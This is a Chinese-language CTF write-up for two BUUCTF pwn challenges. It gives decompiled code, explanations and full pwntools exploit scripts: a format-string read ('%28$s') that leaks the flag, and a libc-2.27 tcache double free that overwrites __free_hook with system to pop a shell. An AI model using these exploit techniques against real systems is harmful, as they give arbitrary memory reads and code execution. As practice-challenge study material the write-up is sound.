记录下buuctf pwn的write up

judgement_mna_2016

int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *v3; // esp
  int result; // eax
  char format; // [esp+0h] [ebp-4Ch]
  unsigned int v6; // [esp+40h] [ebp-Ch]
  int *v7; // [esp+44h] [ebp-8h]

  v7 = &argc;
  v6 = __readgsdword(0x14u);
  v3 = alloca(144);
  printf("Flag judgment system\nInput flag >> ");
  if ( getnline(&format, 0x40) )
  {
    printf(&format);
    if ( !strcmp(&format, flag) )
      result = puts("\nCorrect flag!!");
    else
      result = puts("\nWrong flag...");
  }
  else
  {
    puts("Unprintable character");
    result = -1;
  }
  return result;
}

逻辑就是之前把flag文件读入内存，然后输入字符串和flag字符串进行对比
主函数存在格式化字符串漏洞，我们直接在栈上找到格式化字符串参数的位置，然后直接读出来即可

from pwn import *

local = 0

binary = "./judgement_mna_2016"
port = "29113"

if local == 1:
	p = process(binary)
else:
	p = remote("node3.buuoj.cn",port)

def dbg():
	context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']

p.recvuntil("Input flag >> ")
payload = "%28$s"
p.sendline(payload)

p.interactive()

ciscn_2019_en_3

• 考点
  1. 程序调试，栈溢出泄漏地址
  2. libc-2.27 UAF

程序先给了一个输入name和id的东西，发现了格式化字符串但是由于是__printf_chk，所以没找到好的利用点
然后下面是输入id，还有个puts，调试发现id后面是有libc函数setbuffer的，又因为是puts函数直接来给他泄漏出来

add功能只允许申请0-0x50大小的chunk

_isoc99_scanf("%d", &size);
  if ( size < 0 && size > 0x50 )
    exit(0);

delete功能存在UAF
在老版的libc-2.27下是允许double free存在的
然后直接改__free_hook为system一把梭就行了
新版的打完今天的VN再试一下

from pwn import *

local = 0

binary = "./ciscn_2019_en_3"
libc_path = '../libc-2.27.so'
port = "27391"

if local == 1:
	p = process(binary)
else:
	p = remote("node3.buuoj.cn",port)

def dbg():
	context.log_level = 'debug'

def leak_libc(addr):
	global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_
	libc = ELF(libc_path)
	libc_base = addr - libc.sym['setbuffer']
	print ("[*] libc base:",hex(libc_base))
	__malloc_hook = libc_base + libc.sym['__malloc_hook']
	system = libc_base + libc.sym['system']
	# binsh_addr = libc_base + libc.search('/bin/sh').next()
	__free_hook = libc_base + libc.sym['__free_hook']
	_IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']

def add(size,content):
	p.sendlineafter('Input your choice','1')
	p.sendlineafter('Please input the size of story:',str(size))
	p.sendafter('please inpute the story:',content)

def free(index):
	p.sendlineafter('Input your choice:','4')
	p.sendlineafter('Please input the index:',str(index))

context.terminal = ['tmux','splitw','-h']

p.recvuntil("What's your name?")
p.sendline("A13x")
p.recvuntil("Please input your ID.")
p.send("aaaaaaaa")

leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00")) - 231
leak_libc(leak)

add(0x50,"1")
add(0x50,"/bin/sh\x00")

free(0)
free(0)

add(0x50,p64(__free_hook))
add(0x50,"A13x")
add(0x50,p64(system))
free(1)

p.interactive()